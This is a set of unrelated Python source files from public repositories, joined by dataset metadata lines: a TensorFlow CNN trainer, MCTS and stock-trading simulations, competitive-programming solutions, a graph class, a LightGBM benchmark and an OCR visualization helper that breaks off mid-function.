y_存的是实际图像的标签,即对应于每张输入图片实际的值\ny_ = tf.placeholder(tf.float32, [None, 8])\n\n# 将图片从784维向量重新还原为28×28的矩阵图片,\n# 原因参考卷积神经网络模型图,最后一个参数代表深度,\n# 因为MNIST是黑白图片,所以深度为1,\n# 第一个参数为-1,表示一维的长度不限定,这样就可以灵活设置每个batch的训练的个数了\nx_image = tf.reshape(x, [-1, 28, 28, 1])\n\n# 第一层卷积\n# 将过滤器设置成5×5×1的矩阵,\n# 其中5×5表示过滤器大小,1表示深度,因为MNIST是黑白图片只有一层。所以深度为1\n# 32表示卷积在经过每个5×5大小的过滤器后可以算出32个特征,即经过卷积运算后,输出深度为32\nW_conv1 = weight_variable([5, 5, 1, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv1 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv1 = tf.nn.relu(conv2d(x_image, W_conv1) + b_conv1)\n\nW_conv3 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv3 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv3 = tf.nn.relu(conv2d(h_conv1, W_conv3) + b_conv3)\n\nW_conv5 = weight_variable([5, 5, 32, 32])\n# 有多少个输出通道数量就有多少个偏置\nb_conv5 = bias_variable([32])\n# 使用conv2d函数进行卷积计算,然后再用ReLU作为激活函数\nh_conv5 = tf.nn.relu(conv2d(h_conv3, W_conv5) + b_conv5)\n\n\nh_pool1=max_pool_2x2(h_conv5)\n# 卷积以后再经过池化操作\n#h_pool1 = max_pool_2x2(h_conv1)\n\n\n\n\n\n# 第二层卷积\n# 因为经过第一层卷积运算后,输出的深度为32,所以过滤器深度和下一层输出深度也做出改变\nW_conv2 = weight_variable([5, 5, 32, 64])\nb_conv2 = bias_variable([64])\nh_conv2 = tf.nn.relu(conv2d(h_pool1, W_conv2) + b_conv2)\n\nW_conv4 = weight_variable([5, 5, 64, 64])\nb_conv4 = bias_variable([64])\nh_conv4 = tf.nn.relu(conv2d(h_conv2, W_conv4) + b_conv4)\n\nh_pool2 = max_pool_2x2(h_conv4)\n\n# 全连接层\n# 经过两层卷积后,图片的大小为7×7(第一层池化后输出为(28/2)×(28/2),\n# 第二层池化后输出为(14/2)×(14/2)),深度为64,\n# 我们在这里加入一个有1024个神经元的全连接层,所以权重W的尺寸为[7 * 7 * 64, 1024]\nW_fc1 = weight_variable([7 * 7 * 64, 1024])\n# 偏置的个数和权重的个数一致\nb_fc1 = bias_variable([1024])\n# 这里将第二层池化后的张量(长:7 宽:7 深度:64) 变成向量(跟上一节的Softmax模型的输入一样了)\nh_pool2_flat = tf.reshape(h_pool2, [-1, 7 * 7 * 64])\n# 使用ReLU激活函数\nh_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1)\n\n# dropout\n# 为了减少过拟合,我们在输出层之前加入dropout\nkeep_prob = tf.placeholder(tf.float32)\nh_fc1_drop = tf.nn.dropout(h_fc1, keep_prob)\n\n# 输出层\n# 全连接层输入的大小为1024,而我们要得到的结果的大小是10(0~9),\n# 所以这里权重W的尺寸为[1024, 10]\nW_fc2 = weight_variable([1024, 8])\nb_fc2 = bias_variable([8])\n# 最后都要经过Softmax函数将输出转化为概率问题\ny_conv = tf.nn.softmax(tf.matmul(h_fc1_drop, W_fc2) + b_fc2)\n\n# 损失函数和损失优化\n#cross_entropy = tf.reduce_sum(y_ * tf.log(y_conv))\n# coss_entropy=tf.losses.sparse_softmax_cross_entropy(labels=y_,logits=y_conv)\ncross_entropy = tf.reduce_mean (\n tf.nn.softmax_cross_entropy_with_logits (labels = y_, logits = y_conv))#损失函数,交叉熵方法\n# train_step = tf.train.AdamOptimizer(1e-4).minimize(cross_entropy)\ntrain_step= tf.train.GradientDescentOptimizer(0.001).minimize(cross_entropy)\n\n# 测试准确率,跟Softmax回归模型的一样\ncorrect_prediction = tf.equal(tf.argmax(y_conv, 1), tf.argmax(y_, 1))\naccuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n# 开始训练\nwith tf.Session() as sess:\n # 初始化所有变量\n sess.run(tf.global_variables_initializer())\n saver=tf.train.Saver(max_to_keep=3)\n # 训练两万次\n for i in range(20000):\n # # 每次获取50张图片数据和对应的标签\n # batch1 = train_data.next_batch(50)\n # batch2=test_data.next_batch(50)\n # # 每训练100次,我们打印一次训练的准确\n train_accuracy = sess.run(accuracy, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n print(\"step %d, training accuracy %g\" % (i, train_accuracy))\n sess.run(train_step, feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})# 这里是真的训练,将数据传入\n #train_step.run(feed_dict={x: train_data, y_: Ytrain_onehot, keep_prob: 0.5})\n test_accuracy = sess.run(accuracy, feed_dict={x: test_data, y_: onehot_encoded2, keep_prob: 1.0})\n test_accuracy_list.append(test_accuracy)\n if i%5000 == 0:\n 
saver.save(sess, CKPT_DIR+'model.ckpt',global_step=i)\n if i % 100 == 0:\n print(test_accuracy)\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"kdzhangzhicheng/cnntrainowndata","sub_path":"cnnyj.py","file_name":"cnnyj.py","file_ext":"py","file_size_in_byte":8532,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"73588458889","text":"from constants import *\r\nfrom board_and_rules import Board, GameRules, PlayGame\r\nfrom mcts import Node, MCTS\r\n\r\nclass PlayVsAI(PlayGame, MCTS):\r\n\r\n def __init__(self):\r\n super().__init__()\r\n\r\n def play_vs_mcts(self, num_iters, num_sims=1, hide_evaluations=True):\r\n while self.is_terminal(self.game) == \"-\":\r\n move = self.input_move(\"x\")\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n\r\n if self.is_terminal(self.game) != \"-\":\r\n break\r\n\r\n move = self.search(self.game, move, num_iters, num_sims, hide_evaluations=hide_evaluations)\r\n print(move_keys_inv[move[0]])\r\n self.make_move_(self.game, move)\r\n self.print_board()\r\n print(self.is_terminal(self.game), \"wins!\")\r\n\r\nif __name__ == '__main__':\r\n run = PlayVsAI()\r\n run.play_vs_mcts(10000)\r\n ","repo_name":"BevandaIvan/uttt-mcts","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":894,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"128197331","text":"# Solved on 2021.01.04\n# 2667 단지번호붙이기 ver.BFS\n\n# ---------------------------\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\n\ndef bfs(board, x, y, visited):\n global count\n\n queue = deque()\n queue.append((x, y))\n\n visited[x][y] = True\n count += 1\n\n dx = [-1, 1, 0, 0]\n dy = [0, 0, -1, 1]\n\n while queue:\n a, b = queue.popleft()\n for i in range(4):\n nx = a + dx[i]\n ny = b + dy[i]\n\n if nx < 0 or ny < 0 or nx >= n or ny >= n:\n continue\n elif not visited[nx][ny] and board[nx][ny] == 1:\n queue.append((nx, ny))\n visited[nx][ny] = True\n count += 1\n\n\nn = int(input())\nboard = []\nvisited = [[False] * n for _ in range(n)]\ncount = 0\nnum = 0\nc = []\n\n\nfor _ in range(n):\n board.append(list(map(int, input().rstrip())))\n\nfor i in range(n):\n for j in range(n):\n if board[i][j] == 1 and not visited[i][j]:\n bfs(board, i, j, visited)\n c.append(count)\n count = 0\n num += 1\n\nprint(num)\nc.sort()\nfor i in c:\n print(i)\n","repo_name":"gemstoneyang/Algorithm","sub_path":"BOJ/DFS_and_BFS/2667_2.py","file_name":"2667_2.py","file_ext":"py","file_size_in_byte":1139,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"9829919055","text":"import pygame\nfrom pygame.locals import DOUBLEBUF, QUIT, KEYUP, K_ESCAPE\nimport sys\n\npygame.init()\n\n# 디스플레이 초기화\nDISPLAYSURF = pygame.display.set_mode((640, 480), DOUBLEBUF)\npygame.display.set_caption(\"등축 투영\")\n\n\n# 맵 데이터: (1) 벽, (0) 바닥\nmap_data = [\n [1, 1, 1, 1, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 0, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 0, 0, 1],\n [1, 1, 1, 1, 1],\n]\n\n# 타일 이미지 로드\nwall = pygame.image.load(\"map_tset01.png\").convert_alpha()\ngrass = pygame.image.load(\"map_test02.png\").convert_alpha()\nTILEWIDTH = 64 # 타일 너비\nTILEHEIGHT = 64 # 타일 높이\nTILEHEIGHT_HALF = TILEHEIGHT / 2\nTILEWIDTH_HALF = TILEWIDTH / 2\n\n# 타일 배치\nfor row_nb, row in enumerate(map_data):\n for col_nb, tile in enumerate(row):\n if tile == 1:\n tileImage = wall\n 
else:\n tileImage = grass\n cart_x = row_nb * TILEWIDTH_HALF\n cart_y = col_nb * TILEHEIGHT_HALF\n iso_x = cart_x - cart_y\n iso_y = (cart_x + cart_y) / 2\n centered_x = DISPLAYSURF.get_rect().centerx + iso_x\n centered_y = DISPLAYSURF.get_rect().centery / 2 + iso_y\n DISPLAYSURF.blit(tileImage, (centered_x, centered_y))\n\n# 게임 실행\nFPSCLOCK = pygame.time.Clock()\nwhile True:\n for event in pygame.event.get():\n if event.type == QUIT:\n pygame.quit()\n sys.exit()\n if event.type == KEYUP:\n if event.key == K_ESCAPE:\n pygame.quit()\n sys.exit()\n\n pygame.display.flip()\n FPSCLOCK.tick(30)","repo_name":"kywon22/2DGP-project_2021184019","sub_path":"dummy/past/map_state.py","file_name":"map_state.py","file_ext":"py","file_size_in_byte":1613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"12662499811","text":"import pandas as pd\nimport numpy as np\nfrom portfolio import *\nfrom get_data import *\nfrom utils import *\nimport copy\n#from matplotlib import pyplot as plt\n#import seaborn\n\n#housekeeping\nconfig = Config()\ntransaction_fee = config.get_generic_config_property('portfolio','transaction_fee')\nmax_holdings = config.get_generic_config_property('portfolio','max_holdings')\n\n#beginning = datetime.datetime.strptime(config.get_generic_config_property('stocks','start_date'), '%Y-%m-%d').date()\n#finish = datetime.datetime.strptime(config.get_generic_config_property('stocks','end_date'), '%Y-%m-%d').date()\n\nportfolio = Portfolio()\nraw_market_data = GetStocks()\nraw_market_data = raw_market_data.stock_data.dropna()\n\n#time window has to reflect number of trading days, should be number of rows in the raw market data - 1\ntime_window = raw_market_data.shape[0] - 1 #114 #(finish - beginning).days - 5 #days\ntoday = raw_market_data.iloc[2].name.strftime('%Y-%m-%d')\n\n\n\ndef assess_buy_and_hold(portfolio_dict: dict(), raw_market_data: pd.DataFrame()) -> dict():\n buy_and_hold_keys = list(portfolio_dict.keys())\n buy_and_hold_keys.remove('cash')\n final_close = raw_market_data.Close[buy_and_hold_keys].iloc[-1].to_dict()\n portfolio_dict_buy_and_hold_final = portfolio_dict.copy()\n for k, v in portfolio_dict_buy_and_hold_final.items():\n if k == 'cash':\n pass\n else:\n portfolio_dict_buy_and_hold_final[k]['current_price'] = final_close[k]\n return portfolio_dict_buy_and_hold_final\n\n\ndef run_trading_simulation (period, portfolio_dict, date, raw_market_data):\n print(f'here is the initial dict: {portfolio_dict}')\n days_remaining = period\n sell_side_complete = False\n updated_portfolio = portfolio_dict.copy()\n today_index = 2\n day_before_yesterday_index = today_index - 2\n\n while days_remaining > 0:\n print(f'analyzing stocks, {days_remaining} days left to analyze')\n market_data = raw_market_data.iloc[day_before_yesterday_index:today_index] #subset the raw market data to a df of three rows, current, previous, previous - 1\n updated_portfolio = run_trading_day(sell_side_complete, updated_portfolio, date, market_data)\n days_remaining -= 1\n today_index += 1 #must advance the date\n day_before_yesterday_index = today_index - 2\n print(f'here is the updated dict {updated_portfolio}')\n print(\"total value of current portfolio is: \" + total_value(updated_portfolio).astype('str'))\n #update the market price of the holdings in the dictionary here\n return updated_portfolio\n\ndef run_trading_day (sell_side_complete, portfolio_dict, date, market_data):\n print(sell_side_complete)\n # if sell_side_complete == False:\n # 
print('im buying!')\n # updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n # else:\n print('im selling!')\n # sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n \n sell_side_complete, updated_portfolio = run_sell_side(portfolio_dict, date, market_data)\n\n print('im buying!')\n updated_portfolio = run_buy_side(portfolio_dict, date, market_data, portfolio.threshold)\n return updated_portfolio\n\ndef run_buy_side (portfolio_dict, date, market_data, threshold):\n ls_to_buy = portfolio.candidates_for_purchase(market_data, threshold) #based on overall candidates recent performance, what if security is already in portfolio? do we differentiate?\n remaining_purchases = len(ls_to_buy)\n portfolio_size = len(portfolio_dict.keys())\n cash = portfolio_dict['cash']\n try:\n cash_for_purchase = (cash / remaining_purchases)\n except:\n cash_for_purchase = 0\n\n while ((cash - transaction_fee) > 0) & (len(ls_to_buy)>0) & (portfolio_size > 0) & (portfolio_size < max_holdings):\n ticker = ls_to_buy.pop(0)\n\n if (ticker not in portfolio_dict.keys()) & (portfolio_size > 0) & ((cash_for_purchase - transaction_fee) > 0):\n portfolio_dict[ticker] = portfolio.make_an_empty_holding()\n portfolio_dict[ticker] = portfolio.purchase_shares(ticker, 'buy', cash_for_purchase, market_data, portfolio_dict[ticker])\n portfolio_dict['cash'] -= cash_for_purchase\n portfolio_size = portfolio.how_many_holdings_to_buy(portfolio_dict)\n cash = portfolio_dict['cash']\n portfolio_size = len(portfolio_dict.keys())\n \n return portfolio_dict\n\ndef run_sell_side (portfolio_dict, date, market_data):\n ls_to_sell = portfolio.candidates_for_sale(portfolio_dict, market_data, portfolio.threshold ) #based on what is in portfolio now\n action = 'sell'\n print(ls_to_sell)\n for holding in ls_to_sell:\n if holding == 'all holdings are down!':\n pass\n else:\n portfolio_dict = portfolio.sell_shares(holding, action, portfolio_dict, market_data)\n sell_side_complete = True\n return sell_side_complete, portfolio_dict\n\ndef total_value (portfolio_dict: dict())->float():\n tmp_value = float()\n for k, v in portfolio_dict.items():\n if k == 'cash':\n pass\n else:\n tmp_value += (portfolio_dict[k]['units'] * portfolio_dict[k]['current_price'])\n \n tmp_value = tmp_value + portfolio_dict['cash']\n return tmp_value\n\n\nif __name__ == \"__main__\":\n \n case_studies = {}\n total_transactions = []\n for sim in range(29):\n portfolio = Portfolio()\n portfolio_dict_raw = {}\n portfolio_dict_raw = portfolio.get_new_portfolio(raw_market_data.iloc[:2], specific_ls=[]).copy()\n print(f'here is the very beginning of dict: {portfolio_dict_raw}')\n portfolio_dict_buy_and_hold = copy.deepcopy(portfolio_dict_raw)\n portfolio_dict_buy_and_hold_final = assess_buy_and_hold(portfolio_dict_buy_and_hold, raw_market_data)\n final_value_buy_and_hold = total_value(portfolio_dict_buy_and_hold_final)\n output_portfolio = run_trading_simulation(time_window, portfolio_dict_raw, today, raw_market_data)\n final_value_buy_and_sell = total_value(output_portfolio)\n case_studies[sim] = {'buy_and_hold':[final_value_buy_and_hold, list(portfolio_dict_buy_and_hold_final.keys())], 'buy_and_sell': [final_value_buy_and_sell, list(output_portfolio.keys())]} #'buy_and_hold':final_value_buy_and_hold,\n 
total_transactions.append(portfolio.transaction_tracker)\n\n\n","repo_name":"andrewcmilne/stock_analyzer","sub_path":"src/trading_day.py","file_name":"trading_day.py","file_ext":"py","file_size_in_byte":6421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"13679790750","text":"from math import gcd\nimport sys\nsys.setrecursionlimit(1000000)\n\ndef main():\n N = int(input())\n A = list(map(int, input().split()))\n tmp = gcd(A[0],A[1])\n set_A = set(A)\n for i in range(2,N):\n tmp = gcd(tmp, A[i])\n\n if tmp != 1:\n print('not coprime')\n exit()\n max_A = max(A)\n ans = [False] * (max_A + 1)\n flag = True\n def divisor(n):\n ass = []\n for i in range(1,int(n**0.5)+1):\n if n%i == 0:\n ass.append(i)\n if ans[i]:\n return False\n if i != 1:\n ans[i] = True\n if i**2 == n:\n continue\n if ans[n//i]:\n return False\n ans[n//i] = True\n ass.append(n//i)\n if n != 1:\n ans[n] = True\n return True #sortされていない\n for a in A:\n if not divisor(a):\n flag = False\n break\n\n if flag:\n print('pairwise coprime')\n else:\n print('setwise coprime')\n \n\n\n\n\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"tails1434/Atcoder","sub_path":"ABC/177/E.py","file_name":"E.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"73984560648","text":"import argparse\n\nparser = argparse.ArgumentParser(description=\"Run\")\nparser.add_argument('--runnable', '-m', type=str, default=\"chatbot\", help=\"The file to run.\")\n\nargs = parser.parse_args()\n\nif args.runnable == \"chatbot\":\n from runnable.chatbot import run_chatbot\n \n run_chatbot()\n \nelif args.runnable == \"endpoint\":\n from runnable.endpoint import run_model_endpoint\n \n run_model_endpoint()\n \nelif args.runnable == \"discord_index\":\n from runnable.discord_index import run_discord_index\n \n run_discord_index()\n \nelif args.runnable == \"querier\":\n from backend.querier import run_querier\n \n run_querier()\n \nelse :\n raise Exception(\"Invalid runnable.\")","repo_name":"Pangasius/llama-index-tests","sub_path":"src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"26809306747","text":"import json\nfrom typing import Optional, Union\n\n\nclass AdjacencyListGraph:\n def __init__(self, is_directed: bool = False, is_weighted: bool = False) -> None:\n self.graph: dict[int, list[Union[int, list]]] = {}\n self.is_directed = is_directed\n self.is_weighted = is_weighted\n\n def __str__(self) -> str:\n return json.dumps(self.graph)\n\n def add_vertex(self, vertex: int) -> None:\n \"\"\"Insert a new Vertex.\"\"\"\n if vertex not in self.graph:\n self.graph[vertex] = []\n\n def add_edge(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Insert and return a new Edge from vertex_1 to vertex_2 with auxiliary element weight.\"\"\"\n for vertex in [vertex_1, vertex_2]:\n self.add_vertex(vertex)\n\n if self.is_edge_existed(vertex_1, vertex_2):\n return\n\n self.graph[vertex_1].append([vertex_2, weight] if self.is_weighted else vertex_2)\n if not self.is_directed:\n self.graph[vertex_2].append([vertex_1, weight] if self.is_weighted else vertex_1)\n\n def is_edge_existed(self, vertex_1: int, vertex_2: int) -> bool:\n \"\"\"Return the boolean value representing the connection between 2 vertices\"\"\"\n for adjacent_vertex in 
self.get_adjacent_vertices(vertex_1):\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex_2:\n return True\n return False\n\n def get_edge_weight(self, vertex_1: int, vertex_2: int) -> Optional[int]:\n \"\"\"Return the weight of the edge from vertex_1 to vertex_2, or None if not adjacent.\"\"\"\n if not self.is_weighted:\n return None\n\n for adjacent_vertex, weight in self.get_adjacent_vertices(vertex_1):\n if adjacent_vertex == vertex_2:\n return weight\n\n return None\n\n def set_edge_weight(self, vertex_1: int, vertex_2: int, weight: int = 0) -> None:\n \"\"\"Set the weight of the edge from vertex_1 to vertex_2 if adjacent.\"\"\"\n if not self.is_weighted:\n return\n\n if not self.is_edge_existed(vertex_1, vertex_2):\n return\n\n for start_vertex, end_vertex in (\n [(vertex_1, vertex_2)] if self.is_directed else [(vertex_1, vertex_2), (vertex_2, vertex_1)]\n ):\n for adjacent_vertex in self.get_adjacent_vertices(start_vertex):\n if adjacent_vertex[0] == end_vertex:\n adjacent_vertex[1] = weight\n\n def vertex_count(self) -> int:\n \"\"\"Return the number of vertices in the graph.\"\"\"\n return len(self.graph.keys())\n\n def edge_count(self) -> int:\n \"\"\"Return the number of edges in the graph.\"\"\"\n total_edges = sum(len(adjacent_vertices) for adjacent_vertices in self.graph.values())\n return total_edges if self.is_directed else total_edges // 2\n\n def vertices(self) -> list[int]:\n \"\"\"Return a list of all vertices of the graph.\"\"\"\n return list(self.graph.keys())\n\n def edges(self) -> list[tuple]:\n \"\"\"Return a list of all edges of the graph.\"\"\"\n edges = []\n for vertex, adjacent_vertices in self.graph.items():\n for adjacent_vertex in adjacent_vertices:\n edges.append((vertex, *adjacent_vertex) if self.is_weighted else (vertex, adjacent_vertex))\n return edges\n\n def get_adjacent_vertices(self, vertex: int) -> list[Union[int, list]]:\n \"\"\"Return a list of all vertices connecting with the vertex.\"\"\"\n return self.graph.get(vertex, [])\n\n def in_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of incoming edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n in_degree_total = 0\n for vertex_value, adjacent_vertices in self.graph.items():\n if vertex_value == vertex:\n continue\n\n for adjacent_vertex in adjacent_vertices:\n if (adjacent_vertex[0] if self.is_weighted else adjacent_vertex) == vertex:\n in_degree_total += 1\n\n return in_degree_total\n\n def out_degree(self, vertex: int) -> Optional[int]:\n \"\"\"Return number of outgoing edges incident to the vertex in the graph.\"\"\"\n if not self.is_directed:\n return None\n\n return len(self.get_adjacent_vertices(vertex))\n\n def degree(self, vertex: int) -> int:\n \"\"\"Return number of incident edges to the vertex in the graph.\"\"\"\n if self.is_directed:\n return self.in_degree(vertex) + self.out_degree(vertex)\n\n return len(self.get_adjacent_vertices(vertex))\n\n\nif __name__ == \"__main__\":\n for is_directed, is_weighted in [(False, False), (True, False), (False, True), (True, True)]:\n graph = AdjacencyListGraph(is_weighted=is_weighted, is_directed=is_directed)\n graph.add_vertex(0)\n graph.add_vertex(1)\n graph.add_vertex(2)\n graph.add_edge(1, 2, 1)\n graph.add_edge(2, 3, 2)\n graph.add_edge(4, 3, 3)\n graph.add_edge(4, 5, 4)\n\n assert graph.is_edge_existed(0, 1) is False\n assert graph.is_edge_existed(1, 2) is True\n assert graph.is_edge_existed(2, 1) is False if is_directed else True\n\n assert 
graph.get_edge_weight(0, 1) is None\n assert graph.get_edge_weight(1, 2) == (1 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (1 if is_weighted and not is_directed else None)\n\n graph.set_edge_weight(1, 2, 5)\n assert graph.get_edge_weight(1, 2) == (5 if is_weighted else None)\n assert graph.get_edge_weight(2, 1) == (5 if is_weighted and not is_directed else None)\n\n assert graph.vertex_count() == 6\n assert graph.edge_count() == 4\n assert graph.vertices() == [0, 1, 2, 3, 4, 5]\n\n assert graph.in_degree(2) == (1 if is_directed else None)\n assert graph.out_degree(2) == (1 if is_directed else None)\n assert graph.degree(2) == 2\n\n if not is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 1),\n (2, 3),\n (3, 2),\n (3, 4),\n (4, 3),\n (4, 5),\n (5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [1, 3]\n elif is_directed and not is_weighted:\n assert graph.edges() == [\n (1, 2),\n (2, 3),\n (4, 3),\n (4, 5),\n ]\n assert graph.get_adjacent_vertices(2) == [3]\n elif not is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 1, 5),\n (2, 3, 2),\n (3, 2, 2),\n (3, 4, 3),\n (4, 3, 3),\n (4, 5, 4),\n (5, 4, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[1, 5], [3, 2]]\n elif is_directed and is_weighted:\n assert graph.edges() == [\n (1, 2, 5),\n (2, 3, 2),\n (4, 3, 3),\n (4, 5, 4),\n ]\n assert graph.get_adjacent_vertices(2) == [[3, 2]]\n","repo_name":"duongleh/data-structures-and-algorithms","sub_path":"Graph/graph.py","file_name":"graph.py","file_ext":"py","file_size_in_byte":7235,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"20788061765","text":"import dataclasses\nimport gemmi\nfrom ..job import Job\nfrom ..reflections import DataItem, write_mtz\nfrom ..structure import read_structure, write_mmcif\n\n\n@dataclasses.dataclass\nclass SheetbendResult:\n structure: gemmi.Structure\n seconds: float\n\n\nclass Sheetbend(Job):\n def __init__(\n self,\n structure: gemmi.Structure,\n fsigf: DataItem,\n freer: DataItem = None,\n regularise: bool = False,\n ):\n super().__init__(\"csheetbend\")\n self.structure = structure\n self.fsigf = fsigf\n self.freer = freer\n self.regularise = regularise\n\n def _setup(self) -> None:\n write_mmcif(self._path(\"xyzin.cif\"), self.structure)\n write_mtz(self._path(\"hklin.mtz\"), [self.fsigf, self.freer])\n self._args += [\"-mtzin\", \"hklin.mtz\"]\n self._args += [\"-colin-fo\", self.fsigf.label()]\n if self.freer is not None:\n self._args += [\"-colin-free\", self.freer.label()]\n self._args += [\"-pdbin\", \"xyzin.cif\"]\n self._args += [\"-pdbout\", \"xyzout.cif\"]\n self._args += [\"-cycles\", \"12\"]\n self._args += [\"-resolution-by-cycle\", \"6,3\"]\n if self.regularise:\n self._args += [\"-postrefine-u-iso\"]\n self._args += [\"-pseudo-regularize\"]\n self._args += [\"-refine-regularize-cycles\", \"3\"]\n\n def _result(self) -> SheetbendResult:\n self._check_files_exist(\"xyzout.cif\")\n return SheetbendResult(\n structure=read_structure(self._path(\"xyzout.cif\")),\n seconds=self._seconds,\n )\n","repo_name":"paulsbond/modelcraft","sub_path":"modelcraft/jobs/sheetbend.py","file_name":"sheetbend.py","file_ext":"py","file_size_in_byte":1569,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"16843222590","text":"import time \nimport lightgbm as lgb \nimport argparse \nfrom sklearn.datasets import make_classification \nfrom sklearn.model_selection import 
train_test_split \n \n \ndef benchmark_lightgbm(n_rows=100000, n_cols=20, n_classes=2, verbose=True): \n # Generate a random n-class classification problem \n if verbose: \n print(f\"Generating dataset with {n_rows} samples, {n_cols} features...\") \n X, y = make_classification( \n n_samples=n_rows * 2, n_features=n_cols, n_classes=n_classes \n ) \n X_train, X_test, y_train, y_test = train_test_split( \n X, y, random_state=42, test_size=0.5 \n ) \n \n # Define parameters for the LightGBM classifier \n param = { \n \"objective\": \"multiclass\", \n \"num_class\": n_classes, \n \"metric\": \"multi_logloss\", \n \"verbosity\": -1, \n } \n num_round = 20 # the number of training iterations \n \n # Train the model and measure the time it takes \n if verbose: \n print(\"Training model...\") \n start_time = time.time() \n bst = lgb.train(param, lgb.Dataset(X_train, label=y_train), num_round) \n end_time = time.time() \n \n # Measure the time it takes to make predictions \n if verbose: \n print(\"Making predictions...\") \n start_time_pred = time.time() \n predictions = bst.predict(X_test) \n end_time_pred = time.time() \n \n # Return the time it took to train the model and to make predictions \n train_time = end_time - start_time \n pred_time = end_time_pred - start_time_pred \n if verbose: \n print(f\"Training time: {train_time} seconds\") \n print(f\"Prediction time: {pred_time} seconds\") \n results = {\"train_time\": train_time, \"pred_time\": pred_time} \n return results \n \n \nif __name__ == \"__main__\": \n parser = argparse.ArgumentParser() \n parser.add_argument( \n \"--rows\", type=int, default=100000, help=\"Number of rows in the dataset\" \n ) \n parser.add_argument( \n \"--cols\", type=int, default=20, help=\"Number of columns in the dataset\" \n ) \n args = parser.parse_args() \n \n benchmark_lightgbm(n_rows=args.rows, n_cols=args.cols) \n","repo_name":"detrin/datasci-benchmark","sub_path":"lightgbm_benchmark.py","file_name":"lightgbm_benchmark.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"41183375545","text":"import torch\nimport matplotlib.pyplot as plt\nimport matplotlib\nimport cv2\nimport math\nimport random\nimport numpy as np\n\n_tableau20 = [(31, 119, 180), (174, 199, 232), (255, 127, 14), (255, 187, 120), \n (44, 160, 44), (152, 223, 138), (214, 39, 40), (255, 152, 150), \n (148, 103, 189), (197, 176, 213), (140, 86, 75), (196, 156, 148), \n (227, 119, 194), (247, 182, 210), (127, 127, 127), (199, 199, 199), \n (188, 189, 34), (219, 219, 141), (23, 190, 207), (158, 218, 229)] \n \n# Scale the RGB values to the [0, 1] range, which is the format matplotlib accepts. \nfor i in range(len(_tableau20)): \n r, g, b = _tableau20[i] \n _tableau20[i] = (r / 255., g / 255., b / 255.) 
\n\n\n\ndef _setup_image(model_input, batch_id=None):\n # Handle torch Variable instances\n if batch_id is None:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data\n else:\n img = model_input\n else:\n if isinstance(model_input, torch.autograd.Variable):\n img = model_input.data[batch_id]\n else:\n img = model_input[batch_id]\n\n # Copy to CPU if needed\n if isinstance(img, torch.cuda.FloatTensor):\n img = img.cpu()\n\n # NumPy-ify and change from CHW to HWC\n img = img.numpy().transpose( (1,2,0) )\n\n # Undo image normalization\n img = img*(-255)+255\n\n if img.shape[2] == 1:\n # matplotlib plots grayscale images correctly only if you get rid of channel dimension\n img = img[:,:,0]\n cmap = plt.cm.gray\n else:\n # OpenCV images are BGR whereas matplotlib assumes RGB\n img = cv2.convertColor(img, cv.COLOR_BGR2RGB)\n cmap = None # fallback to default\n\n return img, cmap \n\n\ndef _form_display_char(idx, alphabet):\n # Special case for CTC Blank\n if idx == 0:\n return '_'\n\n # Special case for space so it shows up\n if alphabet[idx] == 'u0020':\n return '[SP]'\n \n # Otherwise, just convert to utf-8\n return chr(int(alphabet[idx][1:], 16))\n\ndef _find_low_confidence_spans(model_output, alphabet, conf_thresh, batch_id=None):\n # Actual model output is not set to probability vector yet, need to run softmax\n probs = torch.nn.functional.softmax(model_output.view(-1, model_output.size(2))).view(model_output.size(0), model_output.size(1), -1)\n\n if batch_id is None:\n batch_id = 0\n\n # Handle torch Variable 